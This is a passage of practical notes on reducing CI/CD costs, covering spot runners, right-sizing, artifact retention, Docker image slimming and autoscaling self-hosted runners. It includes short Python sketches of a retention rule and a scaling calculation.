- Compute time: Minutes spent running builds, tests, and scans. At 2,400/month.
- Artifact storage: Docker images, build artifacts, test reports. An unoptimized Docker image is 1-2GB. 100 images/day x 30 days = 3,000 images, or 3-6TB per month, which means significant storage costs.
- Runner infrastructure: Self-hosted runners: EC2 instances, Kubernetes nodes. Over-provisioned runners (running 24/7 but idle 60% of the time) waste money.
- Egress and transfers: Pulling Docker images across regions, downloading dependencies from the internet.
- Caching: As discussed — reduces dependency download and rebuild time by 30-60%.
- Spot instances: Use AWS Spot or GCP Preemptible VMs for CI runners. 60-80% cheaper. Builds are stateless and retryable, making them perfect for spot instances.
- Right-sizing: Don’t use `c5.4xlarge` for a linting job that uses 0.5 CPU. Match runner size to job requirements. Use GitHub Actions `runs-on` labels to route jobs to appropriately-sized runners.
- Artifact lifecycle: Delete old artifacts. ECR lifecycle policies: “Delete untagged images after 7 days, keep only 10 most recent tagged images.” Compress build caches.
- Pipeline optimization: Faster pipelines = fewer compute minutes. Parallelism, caching, affected-only testing, skipping unnecessary stages.
- Off-peak scheduling: Run non-urgent pipelines (nightly security scans, performance tests) during off-peak hours when compute is cheaper or has less contention.
- Docker image optimization: Multi-stage builds. Alpine-based images. `.dockerignore` to exclude unnecessary files. Smaller images = faster pull = less egress.
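The artifact lifecycle rule quoted above ("delete untagged images after 7 days, keep only 10 most recent tagged images") can be modeled in plain Python to make the retention logic explicit. This is not ECR's lifecycle policy format: the image dictionaries and the function name are assumptions made for illustration.

```python
from datetime import datetime, timedelta


def images_to_delete(images, now, untagged_max_age_days=7, keep_tagged=10):
    """Return digests to delete.

    images: list of dicts with 'digest', 'tags' (list) and 'pushed_at' (datetime).
    """
    cutoff = now - timedelta(days=untagged_max_age_days)
    # Rule 1: untagged images older than the cutoff.
    doomed = [img["digest"] for img in images
              if not img["tags"] and img["pushed_at"] < cutoff]
    # Rule 2: tagged images beyond the N most recent.
    tagged = sorted((img for img in images if img["tags"]),
                    key=lambda img: img["pushed_at"], reverse=True)
    doomed += [img["digest"] for img in tagged[keep_tagged:]]
    return doomed
```

Running a model like this against a registry listing before enabling a real policy is one way to preview what would be removed.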
- “How do you track CI/CD costs and attribute them to teams?” Tag CI resources with team identifiers. AWS Cost Explorer with tags for self-hosted runners. GitHub Actions billing dashboard shows usage per workflow. Build a cost dashboard: cost per pipeline run, cost per team, cost trend over time. Create internal “CI budgets” per team with alerts when approaching limits. This creates awareness and incentivizes optimization.
- “Your Docker images are 2GB each. How do you reduce them?” Multi-stage builds: build in a full image, copy only the binary to a minimal image. Use Alpine or distroless base images (5-50MB vs 200-500MB). Don’t include dev dependencies, documentation, or test files in production images. Use `.dockerignore` to exclude `.git`, `node_modules`, test directories. For Node.js: `npm ci --omit=dev` (`npm ci --production` on older npm versions) or separate build and runtime stages. For Go: single binary copied to `scratch` image (literally empty filesystem). Target: 50-200MB for application images.
- “Self-hosted runners cost $10K/month but are idle 70% of the time. What do you do?” Implement auto-scaling. Kubernetes-based runners (ARC for GitHub Actions) scale pods up when jobs are queued and down to zero when idle. For EC2-based runners, use an ASG that scales based on the pending job queue (via a Lambda webhook). Set minimum capacity to 0 during nights/weekends if the team doesn’t deploy off-hours. Use spot instances for the auto-scaled pool (on-demand for minimum capacity). Target: < 30% idle time across the runner fleet.
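The queue-based scaling decision and the idle-time target can be sketched as two small functions. This is a simplified model with assumed parameter names and an assumed default ceiling of 20 runners. ARC and EC2 Auto Scaling have their own configuration and behavior.

```python
import math


def desired_runners(queued_jobs, busy_runners, jobs_per_runner=1,
                    min_runners=0, max_runners=20):
    """Runners needed for current load, clamped to [min_runners, max_runners]."""
    needed = busy_runners + math.ceil(queued_jobs / jobs_per_runner)
    return max(min_runners, min(max_runners, needed))


def idle_fraction(busy_runner_minutes, total_runner_minutes):
    """Share of paid runner time that did no work (0.0 to 1.0)."""
    if total_runner_minutes == 0:
        return 0.0
    return 1 - busy_runner_minutes / total_runner_minutes
```

With `min_runners=0`, an empty queue scales the pool to zero, which is where most of the savings come from for a fleet that is idle 70% of the time. Tracking `idle_fraction` over a month shows whether the fleet is approaching the under-30% target.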